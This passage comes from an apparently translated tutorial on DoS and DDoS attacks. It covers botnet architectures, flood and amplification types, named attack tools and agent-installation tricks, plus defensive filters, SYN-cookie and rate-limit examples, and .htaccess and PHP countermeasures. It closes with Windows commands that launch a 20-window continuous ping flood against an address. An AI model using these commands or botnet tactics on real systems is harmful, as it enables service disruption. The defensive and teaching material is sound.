The hacker can plant a fake entry in the victim system's Domain Name Server pointing to a website of the hacker's choosing. When a client asks the DNS to resolve the tampered name to an IP address, the DNS (whose temporary cache has been altered by the hacker) immediately resolves it to the IP address the hacker chose. As a result, instead of reaching the website they wanted, victims are sent to a web page the hacker created. A truly effective denial-of-service attack!

9.) Distributed DoS attacks (DDoS)
DDoS requires at least a few hackers to take part. First the hackers break into poorly secured computer networks and install a DDoS server program on those systems. Then the hackers agree on a time, use a DDoS client to connect to the DDoS servers, and simultaneously order the servers to launch the DDoS attack against the victim system.

10.) DRDoS (Distributed Reflection Denial of Service Attack)
This is probably the most effective type of attack and the fastest way to reboot the opponent's computer. The method is similar to DDoS, but instead of attacking with many computers, the attacker needs only one machine and attacks through the large servers of the world. Still spoofing the victim's IP address, the attacker sends packets to the strongest, fastest servers with the widest links, such as Yahoo, and these servers reply to the victim's address. Receiving so many packets at once through these large servers quickly chokes the victim's link and crashes or reboots the victim's computer. The attack is effective in that a single computer on an ordinary Internet connection can take down any system on the best link in the world if we do not stop it in time. Our own HVA website was hit by DoS recently using this very technique.

III. Some DoS countermeasures
DoS can cost a great deal of time and money, so countermeasures are needed:
- The system architecture must be designed sensibly, avoiding excessive interdependence that lets a failure in one component disrupt the whole system.
- Set passwords protecting important devices and resources.
- Set authentication levels for users and for information sources on the network (routing updates between routers should also be authenticated).
- Build information filtering on routers and firewalls and a protection system against SYN floods.
- Only accept the services that are needed; temporarily stop services that are not yet required or not in use.
- Build quota and limit systems for users, to prevent malicious users from using the server's resources to attack the server itself or other networks and servers.
- Continuously update, research and test to detect security holes and fix them in time.
- Use measures that continuously monitor system activity, so that abnormal actions are detected immediately.
- Build a standby system.
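The attack types in section II and the filtering and monitoring measures in section III meet in one place: a packet filter that recognizes the shapes described above. The following is an added example, not code from the original document, that classifies a constructed list of packet records (dicts standing in for decoded IP headers) for Land (source equals destination), Smurf/Fraggle (echo requests to a directed-broadcast address), the UDP echo loop (echo/chargen ports on both ends, or a loopback source on the wire), Teardrop (overlapping fragment offsets), Ping of Death (reassembled size over 65535) and SYN flood (many SYNs that never complete). The record layout, the local broadcast address, the thresholds and all sample addresses are assumptions made for this example.

```python
import ipaddress
from collections import defaultdict


def pkt(proto, src, dst, sport=0, dport=0, flags=(), ip_id=0, frag_off=0, mf=False, length=64, icmp_type=None):
    """Constructed packet record: frag_off is in 8-byte units as in the IP header, length is payload bytes."""
    return dict(proto=proto, src=src, dst=dst, sport=sport, dport=dport, flags=set(flags),
                ip_id=ip_id, frag_off=frag_off, mf=mf, length=length, icmp_type=icmp_type)


BROADCAST = {"192.0.2.255"}   # directed-broadcast address of the assumed local /24
ECHO_PORTS = {7, 19}          # echo and chargen: the ports the UDP flood / Fraggle loop bounces between


def classify(packets, syn_threshold=100):
    """Return {alert name: count} for the DoS patterns found in the packet list."""
    alerts = defaultdict(int)
    frags = defaultdict(list)        # (src, dst, ip_id) -> [(start, end)] byte ranges already seen
    syn_pending = defaultdict(set)   # dst -> {(src, sport)} with a SYN but no later ACK
    for p in packets:
        if p["src"] == p["dst"]:
            alerts["land"] += 1
        if ipaddress.ip_address(p["src"]).is_loopback:
            alerts["loopback-source"] += 1        # 127/8 must never arrive from the network
        if p["dst"] in BROADCAST and (p["icmp_type"] == 8 or (p["proto"] == "UDP" and p["dport"] in ECHO_PORTS)):
            alerts["smurf/fraggle-amplification"] += 1
        if p["proto"] == "UDP" and p["sport"] in ECHO_PORTS and p["dport"] in ECHO_PORTS:
            alerts["udp-echo-loop"] += 1
        if p["frag_off"] or p["mf"]:
            start, end = p["frag_off"] * 8, p["frag_off"] * 8 + p["length"]
            if end > 65535:
                alerts["ping-of-death"] += 1      # reassembled datagram would exceed the IP maximum
            key = (p["src"], p["dst"], p["ip_id"])
            if any(start < e and s < end for s, e in frags[key]):
                alerts["teardrop-overlap"] += 1   # this fragment overlaps one already received
            frags[key].append((start, end))
        if p["proto"] == "TCP":
            if "SYN" in p["flags"] and "ACK" not in p["flags"]:
                syn_pending[p["dst"]].add((p["src"], p["sport"]))
            elif "ACK" in p["flags"]:
                syn_pending[p["dst"]].discard((p["src"], p["sport"]))
    for dst, pending in syn_pending.items():
        if len(pending) >= syn_threshold:
            alerts[f"syn-flood->{dst}"] = len(pending)
    return dict(alerts)


# Constructed sample traffic against 192.0.2.10 (one record per attack shape, plus benign traffic).
SAMPLE = (
    [pkt("TCP", f"10.0.{i // 256}.{i % 256}", "192.0.2.10", 40000 + i, 80, flags=("SYN",)) for i in range(150)]
    + [pkt("TCP", "198.51.100.7", "192.0.2.10", 5151, 80, flags=("SYN",)),
       pkt("TCP", "198.51.100.7", "192.0.2.10", 5151, 80, flags=("ACK",))]      # completed handshake
    + [pkt("TCP", "192.0.2.10", "192.0.2.10", 80, 80, flags=("SYN",))]          # Land (also counts as a SYN)
    + [pkt("ICMP", "192.0.2.10", "192.0.2.255", icmp_type=8)]                   # Smurf: echo to broadcast
    + [pkt("UDP", "127.0.0.1", "192.0.2.10", 7, 7)]                             # UDP echo loop, loopback source
    + [pkt("ICMP", "203.0.113.9", "192.0.2.10", ip_id=1, frag_off=0, mf=True, length=1480),
       pkt("ICMP", "203.0.113.9", "192.0.2.10", ip_id=1, frag_off=100, mf=False, length=1480)]   # Teardrop
    + [pkt("ICMP", "203.0.113.9", "192.0.2.10", ip_id=2, frag_off=8185, mf=False, length=100)]   # Ping of Death
    + [pkt("ICMP", "203.0.113.9", "192.0.2.10", ip_id=3, frag_off=0, mf=True, length=1480),
       pkt("ICMP", "203.0.113.9", "192.0.2.10", ip_id=3, frag_off=185, mf=False, length=20)]     # normal fragments
)

if __name__ == "__main__":
    for name, count in sorted(classify(SAMPLE).items()):
        print(f"{name:32} {count}")
```

The legitimate fragments with id 3 are not reported because the second one starts exactly where the first ends, and the completed handshake from 198.51.100.7 is removed from the pending set by its ACK; the SYN-flood count is 151 because the Land packet is itself a SYN that never completes.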
Part III: DDoS

I. The DDoS (Distributed Denial of Service) concept
Distributed Denial of Service (DDoS) is an attack technique that worries ISPs; the mainstream hacker community does not recognize DDoS as a legitimate attack technique, yet black hats enjoy many advantages when they deploy attacks using DDoS.

II. Phases of a DDoS attack
There are 3 phases:
1. Preparation phase: Preparing the attack tool, which usually works on a client-server model. The hacker can write this software or download it easily; by a rough count there are more than 10 DDoS tools available for free on the net (these tools are analyzed in detail in a later section). Next, other hacking techniques are used to take control of a number of hosts on the network, in order to install the required software on them. Configuring and testing the whole attack-network (the network of compromised machines together with the software installed on them, plus the hacker's machine or other machines set up as launch points for the attack) is also done in this phase.
2. Target and timing phase: After making the final choice of target, the hacker adjusts the attack-network to direct the attack toward that target. The timing determines how much damage is done and how quickly the target can respond to the attack.
3. Launching the attack and erasing traces: At the chosen moment the hacker launches the attack from their own machine; the attack command may pass through several levels before reaching the hosts that actually attack. The whole attack-network (possibly thousands of machines) continuously exhausts the target server's capacity, preventing it from operating as designed. After a suitable period of attack, the hacker erases all traces that could be followed back to them; this requires a high level of skill and is not strictly necessary.

III. Overall architecture of a DDoS attack-network
In general, a DDoS attack-network follows one of two main models:
- The Agent-Handler model
- The IRC-Based model
[Figure: the two DDoS attack-network models. Agent-Handler: control traffic over TCP, UDP or ICMP. IRC-Based: control traffic over a secret/private channel or a public channel, carried over TCP, UDP or ICMP.]
1. The Agent-Handler model
In this model the attack-network has 3 components: Agent, Client and Handler.
- Client: the software the hacker uses to control all activity of the attack-network.
- Handler: intermediate software between the Agent and the Client.
- Agent: the software component that carries out the attack on the target, taking commands from the Client through the Handlers.
Architecture of an Agent-Handler attack-network:
[Figure: Agent-Handler attack-network. Attackers control several Handlers; each Handler controls a group of Agents; all Agents attack the Victim.]
From the Client, the attacker communicates with the Handlers to find out how many Agents are online, to adjust the timing of the attack and to update the Agents. Depending on how the attacker configures the attack-network, each Agent is managed by one or more Handlers. The attacker usually places the Handler software on a router or on a server with a lot of traffic passing through, so that communication between Client, Handler and Agent is hard to detect. This communication normally takes place over TCP, UDP or ICMP. The real owners of the Agent machines usually have no idea that they are being used in a DDoS attack, either because they lack the knowledge or because the backdoor Agent programs use so few system resources that their effect on system performance is practically invisible.

2. The IRC-Based model
Internet Relay Chat (IRC) is a multi-user online chat system; IRC lets a user open a multipoint connection to many other users and chat in real time. An IRC network consists of many IRC servers across the Internet communicating with each other over many channels. An IRC network lets users create three kinds of channel: public, private and secret.
- Public channel: lets every user on the channel see the IRC names of, and receive the messages of, every other user on the channel.
- Private channel: designed for communication among permitted parties. Users outside the channel cannot see the IRC names or messages on the channel; however, a user outside the channel can learn that the private channel exists by using channel locator commands.
- Secret channel: like a private channel, but cannot be found with channel locator commands.
Architecture of an IRC-Based attack-network:
[Figure: IRC-based attack-network. Attackers issue commands through the IRC network; the Agents receive them on the channel and attack the Victim.]
An IRC-based network is similar to the Agent-Handler network, but it uses IRC channels as the communication medium between Client and Agents (there is no Handler). This model gives the attacker several further advantages:
+ Communication takes the form of chat messages, which makes detecting it extremely difficult.
+ IRC traffic can cross the network in large volumes without arousing suspicion.
+ There is no need to maintain a list of Agents: the attacker simply logs on to the IRC server and receives the Agents' status reports from the channel.
+ Finally, IRC is also a file-sharing environment, which makes it easy to spread the Agent code to many other machines.

IV. Classification of DDoS attack types
There are many variants of the DDoS technique, but technically they can be divided into two classes by what the attack aims to exhaust: bandwidth depletion and resource depletion. The classification of DDoS attack types is shown below.
[Figure: DDoS attack taxonomy]
DDoS attack
  Bandwidth depletion
    Flood attack: UDP flood, ICMP flood
    Amplification attack: Smurf attack, Fraggle attack
  Resource depletion
    Protocol exploit attack: TCP SYN attack, PUSH + ACK attack
    Malformed packet attack: IP address attack, IP packet options attack
The figure further marks the variants of each leaf as direct attack, loop attack or spoofed-source attack.
1. Bandwidth depletion attacks
A bandwidth depletion attack is designed to swamp the target's network with unwanted traffic, so that as little legitimate traffic as possible reaches the target's service. There are two kinds:
Flood attack: the Agents are directed to send a large volume of traffic to the target's service until it runs out of processing capacity and bandwidth.
Amplification attack: the Agents or the Client send messages to an IP broadcast address, so that every machine on that subnet sends a message to the target's service. This multiplies the unwanted traffic and eats the target's bandwidth.
1.1 Flood attack
The Agents send a large volume of IP traffic that slows the target's service down, hangs it or drives it into saturation, so that the system's real users cannot use the service.
Flood attacks can be divided into two kinds:
UDP flood attack: because UDP is connectionless, a system receiving UDP messages simply accepts every packet as something it must process. A large volume of UDP packets sent to the target's service pushes the whole system to its limit. The packets may be sent to many arbitrary ports or to a single port; usually they go to many ports, which forces the target to work out how to handle each one. If the attacked port is not open, the target answers with an ICMP "destination port unreachable" packet. Agent software normally forges the source IP address to hide its tracks, so those replies go to some other IP address. A UDP flood can also affect the links around the target, because the packets converge on it so heavily.
ICMP flood attack: ICMP was designed for network management and for locating network devices. When the Agents send a large volume of ICMP ECHO REQUEST packets to the target, it has to answer with a corresponding number of ECHO REPLY packets, and the link becomes congested. As above, the Agents' source IP addresses may be forged.
1.2 Amplification attack
An amplification attack exploits the IP broadcast support of routers to amplify and redirect the attack. Broadcast lets the sender name a single broadcast address for a whole subnet instead of many individual addresses; the router then delivers the broadcast packet to every IP address in the subnet. The attacker can send the broadcast messages directly or through Agents to increase the intensity of the attack. When the attacker sends them directly, the systems inside the broadcast network themselves serve as the Agents.
[Figure: Amplification attack. The Attacker/Agent sends a packet to the Amplifier network's broadcast address; every system in the Amplifier network replies to the VICTIM.]

Amplification attacks come in two kinds, Smurf and Fraggle:
Smurf attack: the attacker sends packets to a network amplifier (a router or other network device that supports broadcast) with the victim's address as source. The packets are normally ICMP ECHO REQUESTs, which require the receiver to answer with an ICMP ECHO REPLY. The amplifier delivers the ECHO REQUEST to every system in its broadcast range, and all of them send their REPLY to the IP address of the Smurf victim.
Fraggle attack: the same as Smurf, but UDP ECHO packets are used instead of ICMP ECHO REQUEST. There is a further Fraggle variant that sends UDP ECHO packets to the target's chargen port (19/UDP) with the source set to the target's echo port (7/UDP), creating an endless loop. The attacker starts the attack with one ECHO REQUEST whose destination is a broadcast address; every system in that range immediately replies to the victim's echo port, the victim's ECHO REPLY goes back to the broadcast address, and the cycle can repeat. This is why Fraggle is far more dangerous than Smurf.

2. Resource depletion attacks
By definition, a resource depletion attack is one in which the attacker sends packets that use a protocol contrary to its design, or malformed packets, to tie up network resources so that they can no longer serve ordinary users.
2.1 Protocol exploit attack
TCP SYN attack: the Transmission Control Protocol provides reliable delivery, so it performs a handshake between sender and receiver before data is transferred. First the sender sends a SYN (synchronize) packet. The receiver, on getting the SYN, answers with a SYN/ACK. Finally the sender transmits the last packet, the ACK, and begins sending data.

[Figure: TCP three-way handshake. TCP client (source port 1024-65535) sends SYN to TCP server port 80; the server answers SYN/ACK; the client completes with ACK.]
If the server answers a SYN with a SYN/ACK but does not receive the final ACK within the specified time, it retransmits the SYN/ACK until the timeout expires. All the resources the system set aside to handle the session, should the final ACK arrive, stay blocked until that timeout.
[Figure: SYN packet with a deliberately forged (spoofed) source IP address. The victim sends its SYN/ACK to the spoofed address, which never answers.]

Knowing this weakness, the attacker sends SYN packets to the victim with forged source addresses. The victim sends its SYN/ACK to a non-existent address and never receives the final ACK; only when the timeout expires does it notice and release the resources. If the forged SYNs arrive in large numbers and in rapid succession, the victim's system can run out of resources.
[Figure: normal handshake (Client SYN, Server SYN/ACK, Client ACK) compared with a SYN flood (Attacker/Agent sends SYN after SYN; the Server's SYN/ACKs go unanswered and the final ACK never arrives).]
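To make the resource exhaustion above concrete, here is an added toy model of a TCP listener's half-open (SYN_RECV) table. It is not code from the report or from any of the tools it describes. A listener with a fixed-size backlog and a per-entry timeout is hit by a spoofed SYN flood, and a legitimate client then tries to complete a handshake; a second run uses a simplified stateless SYN cookie (an HMAC of the client's address and sequence number placed in the server's initial sequence number) so that the listener keeps no state until the final ACK arrives. The backlog size, timeout, secret and addresses are assumptions, and the cookie omits the timestamp and MSS encoding of a real implementation.

```python
"""Toy model: half-open TCP backlog under a spoofed SYN flood, with and without
SYN cookies. Added example, not from the original report. All sizes, timing
values, addresses and the cookie secret are made up for illustration."""
import hashlib
import hmac
import random
from collections import OrderedDict

BACKLOG_SIZE = 128        # assumed: maximum half-open entries the listener keeps
SYN_RECV_TIMEOUT = 60.0   # assumed: seconds before an unanswered SYN/ACK is given up


class Listener:
    def __init__(self, use_syn_cookies=False, secret=b"rotating-secret"):
        self.use_syn_cookies = use_syn_cookies
        self.secret = secret
        self.half_open = OrderedDict()   # (src_ip, src_port) -> (expiry, server_isn)
        self.established = set()
        self.dropped_syns = 0

    def _expire(self, now):
        for key in [k for k, (exp, _) in self.half_open.items() if exp <= now]:
            del self.half_open[key]

    def _cookie(self, src_ip, src_port, client_seq):
        # Simplified SYN cookie: keyed hash of the peer's 4-tuple part and ISN.
        msg = f"{src_ip}:{src_port}:{client_seq}".encode()
        digest = hmac.new(self.secret, msg, hashlib.sha256).digest()
        return int.from_bytes(digest[:4], "big")

    def on_syn(self, now, src_ip, src_port, client_seq):
        """Return the server ISN sent in the SYN/ACK, or None if the SYN is dropped."""
        if self.use_syn_cookies:
            return self._cookie(src_ip, src_port, client_seq)   # no state stored
        self._expire(now)
        if len(self.half_open) >= BACKLOG_SIZE:
            self.dropped_syns += 1            # backlog full: new SYNs are lost
            return None
        server_isn = random.getrandbits(32)
        self.half_open[(src_ip, src_port)] = (now + SYN_RECV_TIMEOUT, server_isn)
        return server_isn

    def on_ack(self, now, src_ip, src_port, client_seq, ack_num):
        """Final ACK of the handshake: ack_num must equal server ISN + 1."""
        key = (src_ip, src_port)
        if self.use_syn_cookies:
            expected = (self._cookie(src_ip, src_port, client_seq) + 1) & 0xFFFFFFFF
            ok = ack_num == expected
        else:
            self._expire(now)
            entry = self.half_open.pop(key, None)
            ok = entry is not None and ack_num == (entry[1] + 1) & 0xFFFFFFFF
        if ok:
            self.established.add(key)
        return ok


def spoofed_syn_flood(listener, now, count):
    """SYNs from forged sources: the SYN/ACKs go to hosts that never answer."""
    for i in range(count):
        src_ip = f"10.{(i >> 16) & 255}.{(i >> 8) & 255}.{i & 255}"
        listener.on_syn(now, src_ip, 40000 + (i % 20000), i)


def legit_handshake(listener, now, ip="192.0.2.10", port=51515, client_seq=1000):
    isn = listener.on_syn(now, ip, port, client_seq)
    if isn is None:
        return False
    return listener.on_ack(now + 0.05, ip, port, client_seq, (isn + 1) & 0xFFFFFFFF)


def run_scenario(use_syn_cookies):
    lis = Listener(use_syn_cookies)
    spoofed_syn_flood(lis, now=0.0, count=10 * BACKLOG_SIZE)
    return {
        "flood_dropped": lis.dropped_syns,
        "half_open_after_flood": len(lis.half_open),
        "legit_ok": legit_handshake(lis, now=1.0),   # well inside the timeout
    }


if __name__ == "__main__":
    print("no SYN cookies:", run_scenario(False))
    print("SYN cookies   :", run_scenario(True))
```

Without cookies the flood fills the backlog and the legitimate client is refused until the entries time out; with cookies nothing is stored on SYN, so the flood costs only the SYN/ACK replies and the legitimate handshake still completes.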
PUSH + ACK attack: in TCP, incoming packets are held in a buffer, and when the buffer is full they are passed on to where they are needed. The sender can, however, ask the system to unload the buffer before it is full by sending a packet with the PUSH and ACK bits set to 1. Such packets make the victim's system flush all the data in its TCP buffer immediately and send back an ACK when it has done so. If this happens continuously from many Agents, the system cannot keep up with the volume of incoming packets and hangs.

2.2 Malformed packet attack
A malformed packet attack uses the Agents to send packets whose structure does not follow the standard, in order to crash the victim's system. There are two kinds:
IP address attack: packets whose source and destination addresses are identical (the LAND attack), which the victim's operating system cannot handle and so hangs.
IP packet options attack: the OPTIONS field of the IP packet is randomised and all the QoS bits are set to 1, so the victim has to spend time parsing them; with a large number of Agents this exhausts the victim's processing capacity.

V. Some characteristics of DDoS attack tools
[Figure: characteristics of DDoS software tools]
DDoS software tool
  Agent setup
    Installation: active (scanning, backdoor, trojan, buffer overflow) or passive (bugged website, corrupted file)
    Agent activation: actively poll, or live and wait
  Attack-network communication
    Model: Agent-Handler (Client-Handler and Handler-Agent links) or IRC-based
    Protocol: TCP, UDP, ICMP
    Encryption: yes (IRC private/secret channel) or no (public channel), or none at all
  OS supported: Unix and others (see section 3 below)
DDoS attack tools have a great deal in common as software. Among the shared traits are the way the Agent software is installed, the communication methods among attacker, Handler and Agent, and the operating systems the tools support. The figure above compares these DDoS tools on those points.
1. How the Agent is installed
The attacker can use active or passive methods to install the Agent software on other machines and so build an Agent-Handler or IRC-based attack-network.
Active installation:
Scanning: tools such as Nmap and Nessus are used to find holes in systems that are online, so that Agent software can be installed on them. Nmap returns information about a system named by its IP address; Nessus searches arbitrary IP addresses for a particular known weakness.
Backdoor: having found a list of exploitable systems, the attacker breaks into them and installs the Agent software. Plenty of information on break-in techniques is available online, for example on the site of Common Vulnerabilities and Exposures (CVE), which at the time of writing listed and classified over 4,000 flaws across existing systems. That information is as available to hackers as it is to administrators.
Trojan: a program that performs some ordinary function but also contains hidden functions serving its author's purpose, unknown to the user. A trojan can be used as Agent software.
Buffer overflow: by exploiting a buffer overflow, the attacker can divert the normal flow of execution into his own code, placed in the overwritten data area. This can be used against a program with a buffer-overflow weakness to run the Agent software.
Passive installation:
Bugged website: the attacker can exploit browser flaws to install the Agent software on the machines of users who visit a site. The attacker builds a website whose content hides the code and commands that trap the user; when the user views it, the site silently downloads and installs the Agent software. Microsoft Internet Explorer was the usual target, through ActiveX flaws that let IE download and run code on the visitor's machine automatically.
Corrupted file: another method is to embed code in ordinary files. When a user opens or runs them, the machine is infected with the Agent software at once.
A common trick is a very long file name: because operating systems by default show only the beginning of a file name, the attacker can e-mail the victim a file such as iloveyou.txt_hiiiiiii_NO_this_is_DDoS.exe. Seeing only iloveyou.txt, the user opens the file, it executes, and the Agent code is installed. There are many other tricks, such as disguising files or binding them to others.
Rootkit: programs used to erase traces and hide the presence of the Agent or Handler on the victim's machine. Rootkits are normally used on hosts where the Handler software is installed, which are critical to the operation of the attack-network, or in environments where the Handler is very likely to be detected. They are rarely used on Agents, since an individual Agent is not very important and losing a few of them hardly affects the attack-network.
2. Communication on the attack-network
Protocol: communication on the attack-network can run over TCP, UDP or ICMP.
Encryption: some DDoS tools can encrypt the communication across the whole attack-network; the method depends on the protocol used. In an IRC-based attack-network, private and secret channels are used to hide the control traffic (the channel modes themselves do not encrypt it).
Agent activation: there are two main methods. In the first the Agent regularly polls the Handler or the IRC channel for instructions (active Agent). In the second the Agent simply lies in wait for instructions from the Handler or the IRC channel.
3. Platforms the Agent runs on
DDoS tools are usually built to work on several operating systems: Unix, Linux, Solaris or Windows. The components of an attack-network can run on different operating systems. Typically the Handler runs on large server systems such as Unix, Linux or Solaris, while the Agent runs on the most widespread operating system, Windows, because there are huge numbers of such hosts and they are easy to exploit.

VI. Some DDoS tools
On the common foundation described above, many tools have been written; most are open source, so their complexity keeps growing and new variants keep appearing.
1. Agent-Handler DDoS tools:
TrinOO: one of the first widely distributed DDoS tools. TrinOO has an Agent-Handler architecture and is a bandwidth depletion tool using UDP flood. Early versions did not support IP address spoofing. TrinOO Agents were installed by exploiting a remote buffer overrun. It ran on Solaris 2.5.1 and Red Hat Linux 6.0. The attack-network communicated over TCP (attacker client to Handler) and UDP (Handler to Agent), with symmetric encryption of the traffic among Client, Handler and Agent.
Tribe Flood Network (TFN): Agent-Handler architecture, supporting both bandwidth depletion and resource depletion attacks: UDP flood, ICMP flood, TCP SYN and Smurf. Early versions did not support IP spoofing; TFN Agents were installed by exploiting a buffer overflow. It ran on Solaris 2.x and Red Hat Linux 6.0. The attack-network communicated with ICMP ECHO REPLY packets (TFN2K added TCP and UDP with a selectable protocol) and did not encrypt the communication (TFN2K added encryption).
Stacheldraht: a TFN variant with automatic Agent updates. Attacker-Handler communication is a telnet-like session protected by symmetric encryption.
Shaft: a TrinOO variant; Handler-Agent communication runs over UDP and Attacker-Handler communication over telnet. It attacks with UDP, ICMP and TCP floods and can combine several kinds at once. Detailed statistics let the attacker judge the damage to the victim and the scale of the attack, and adjust the number of Agents accordingly.
2. IRC-based DDoS tools:
IRC-based DDoS tools appeared after the Agent-Handler tools, but they are considerably more complex, because they integrate many features of the Agent-Handler tools.
Trinity: the typical tool of this class. Trinity has almost every attack technique: UDP, TCP SYN, TCP ACK, TCP fragment, TCP NULL, TCP RST, TCP random flag and TCP ESTABLISHED packet floods. It can randomise the source address, and it also supports TCP flood packets with randomised control flags. Trinity can fairly be called one of the most dangerous DDoS tools.
Also worth mentioning is Knight, built to run on Windows and installed with the technique of the Back Orifice trojan. Knight uses SYN flood, UDP flood and Urgent Pointer flood attacks. Finally, Kaiten is a Knight variant supporting many attack techniques: UDP flood, TCP flood, SYN and PUSH + ACK attacks. Kaiten also inherits Trinity's ability to randomise the spoofed source address.
VII. Anti-DDoS techniques
A DDoS attack, also called a denial-of-service attack, is simply a mass of fake traffic aimed at a website at a pre-arranged moment to knock over the hosting server, so that it slows to a crawl or stops altogether. There is honestly no single most effective defence against DDoS, but against small-scale, amateur attacks carried out with ready-made software we can certainly protect ourselves.
Method 1: Blocking iframes. This is considered the most primitive attack. The attacker borrows a website with a lot of traffic, inserts iframes pointing at the site to be hit and makes them refresh over and over; or writes a Flash file with the same effect and places it on the site. Every visitor to that site then unwittingly becomes an attacker of the other one. You can defend against this kind of attack by inserting a piece of JavaScript that stops other sites from loading your pages inside an iframe. Modern browsers also honour the X-Frame-Options: DENY header and the Content-Security-Policy: frame-ancestors 'none' directive, which achieve the same thing without script and cannot be disabled by the framing page.
<script language="JavaScript">
Method 2: Blocking automated page reloads. Another form of attack is a group of people holding down F5, or a pre-programmed tool that reloads the page at fixed intervals, so that your site is reloaded continuously. This can eat the site's bandwidth or slow it down with fake connections. A password is no defence against this. If you are attacked this way, set up a .htaccess file with the following content (it requires Apache's mod_rewrite):

RewriteEngine On
RewriteCond %{HTTP_REFERER} !^https?://(www\.)?daklak\.org [NC]
RewriteCond %{HTTP_USER_AGENT} !bingbot [NC]
RewriteCond %{HTTP_USER_AGENT} !YandexImages [NC]
RewriteCond %{HTTP_USER_AGENT} !YandexBot [NC]
RewriteCond %{HTTP_USER_AGENT} !Googlebot [NC]
RewriteCond %{HTTP_USER_AGENT} !Slurp [NC]
RewriteCond %{HTTP_USER_AGENT} !crawler [NC]
RewriteCond %{HTTP_USER_AGENT} !msnbot [NC]
RewriteCond %{HTTP_USER_AGENT} !alexa [NC]
RewriteRule !antiddos\.phtml http://daklak.org/antiddos.phtml?%{REQUEST_URI} [R=302,L,QSA]

The effect of this .htaccess is to send every request whose Referer does not come from the site itself (which includes a first, direct visit) to antiddos.phtml, while search-engine bots keep working normally. Then create a file antiddos.phtml with the following content:

<?php
// Rebuild the originally requested URL from the query string and ask for one click.
$text = $_SERVER['QUERY_STRING'];
$text = preg_replace('#php&#si', 'php?', $text);
// Escape the client-controlled value before putting it into the page.
$href = 'http://daklak.org/?' . htmlspecialchars($text, ENT_QUOTES, 'UTF-8');
echo '<center><a href="' . $href . '"><font color="blue">[Click here to continue]</font></a></center>';
?>

Change daklak.org to your own address and upload both files to the root directory of the website. From then on, the first visit shows a notice asking for a click before the visitor gets into the site; later requests carry the site's own Referer and pass straight through, while pre-programmed DDoS tools get stuck at the click on their first request, so each reload only hits a tiny HTML page and barely touches the system. Note that this only applies to websites hosted on Linux servers running Apache, and that it gives no protection against a tool that simply sends its own Referer header, because the check trusts a value the client controls.
Method 3: Limiting the number of connections to the website at one time
When a visitor accesses the website, a query is made to the database to fetch the information that is returned and shown on the page. Each server only allows a limited number of database connections; once that limit is exceeded, access becomes difficult or impossible. Hackers exploit this by creating fake visits and connections through proxies, or more professionally through a botnet, to knock the site over and break its database. To limit this, we can cap the number of simultaneous connections (visits) ourselves. Add the following code to the site's home page:

<?php
function server_busy($max_load) {
    // /proc/loadavg exists only on Linux; its first field is the 1-minute load average.
    if (PHP_OS === 'Linux'
        && @file_exists('/proc/loadavg')
        && ($filestuff = @file_get_contents('/proc/loadavg'))) {
        $loadavg = explode(' ', $filestuff);
        if ((float) trim($loadavg[0]) > $max_load) {
            header('HTTP/1.1 503 Service Unavailable');
            header('Retry-After: 120');
            print '<meta http-equiv="content-type" content="text/html; charset=UTF-8" />';
            print 'The site is overloaded, please come back in a few minutes.';
            exit(0);
        }
    }
}
server_busy(8); // 8 = 1-minute load average above which visitors are turned away
?>

The code above turns visitors away, with the message "The site is overloaded, please come back in a few minutes", once the 1-minute load average in /proc/loadavg exceeds the value passed to server_busy(). Note that this value is a load average, not a number of visitors: a threshold such as 1000 would never trigger on an ordinary server, so use a small multiple of the number of CPU cores. This code is for PHP only.
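The load-average check above is a global brake: when it trips, every visitor is turned away, including the legitimate ones. A limiter that counts requests per client, the way the "F5" and reload-tool attacks of Method 2 would need, is shown here as an added example in Python (not code from the report). It keeps a sliding 60-second window per client address, refuses a client once it exceeds the limit, and only trusts X-Forwarded-For when the request arrived through a proxy we operate, because otherwise the attacker can rotate that header to escape the count. The window size, limit, addresses and request log are all constructed for the example.

```python
"""Per-client sliding-window request limiter. Added example, not from the
original report. Window, limit and the sample request log are made up."""
from collections import defaultdict, deque

WINDOW_SECONDS = 60   # assumed window
MAX_REQUESTS = 30     # assumed requests allowed per client per window


class SlidingWindowLimiter:
    def __init__(self, window=WINDOW_SECONDS, limit=MAX_REQUESTS):
        self.window = window
        self.limit = limit
        self.hits = defaultdict(deque)   # client key -> timestamps of recent requests

    def allow(self, client, now):
        """True if the request may proceed; False means answer 503/429 with Retry-After."""
        q = self.hits[client]
        while q and now - q[0] >= self.window:   # drop hits that left the window
            q.popleft()
        if len(q) >= self.limit:
            return False                          # refused requests are not counted
        q.append(now)
        return True


def client_key(remote_addr, forwarded_for=None, trusted_proxy=False):
    """Identify the client. X-Forwarded-For is honoured only when the connection
    came from our own reverse proxy; otherwise it is attacker-controlled."""
    if trusted_proxy and forwarded_for:
        return forwarded_for.split(",")[0].strip()
    return remote_addr


def replay(log, limiter=None):
    """Run a (timestamp, remote_addr, x_forwarded_for) log through the limiter."""
    limiter = limiter or SlidingWindowLimiter()
    return [(ts, ip, limiter.allow(client_key(ip, xff), ts)) for ts, ip, xff in log]


def summarize(decisions):
    out = defaultdict(lambda: {"allowed": 0, "blocked": 0})
    for _, ip, ok in decisions:
        out[ip]["allowed" if ok else "blocked"] += 1
    return dict(out)


# Constructed log: 198.51.100.7 reloads every 0.5 s (the F5 / reload-tool pattern),
# 203.0.113.9 browses at a normal pace of one request every 10 s.
SAMPLE_LOG = sorted(
    [(i * 0.5, "198.51.100.7", None) for i in range(80)]
    + [(i * 10.0, "203.0.113.9", None) for i in range(8)]
)

if __name__ == "__main__":
    for ip, stats in summarize(replay(SAMPLE_LOG)).items():
        print(ip, stats)
```

In production the same logic would sit in front of the PHP application (in the web server or a reverse proxy) and the per-client state would live in shared memory or a cache, not in one PHP process; the example shows the decision logic, not the deployment.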
Method 4: Blocking attacking IPs with .htaccess
When IP addresses from one particular country attack you heavily, you can block every IP of that country: go to http://www.countryipblocks.net/count...elect-formats/ , tick ".htaccess deny", find the country in the list below it, and copy the IP list into your .htaccess file (the .htaccess in the root directory). Bear in mind that a country-level block also shuts out legitimate visitors from that country and does nothing against a botnet spread across many countries.
These are just four simple defences for small attacks. For your website to run well and withstand large-scale attacks you should:
- Optimise the website, for example by building a cache so that fewer requests hit the database.
- Choose a good hosting provider that is able to cope with attacks.
Part 4: Hands-on with some DoS and DDoS attacks
1. Ping of Death attack
- On Windows we can use ping IP -t -l 5000 to ping a destination continuously with a 5000-byte payload. Note that this is really a ping flood with a large payload: the classic Ping of Death (an ICMP packet that reassembles to more than 65,535 bytes) was fixed in operating systems long ago, and Windows ping caps -l at 65500 bytes.
To open 20 ping windows at once, combine it with a For loop:
For /L %i in (1,1,20) do start ping 192.168.1.254 -t -l 36000
This opens 20 windows at the same time, each pinging 192.168.1.254 continuously.
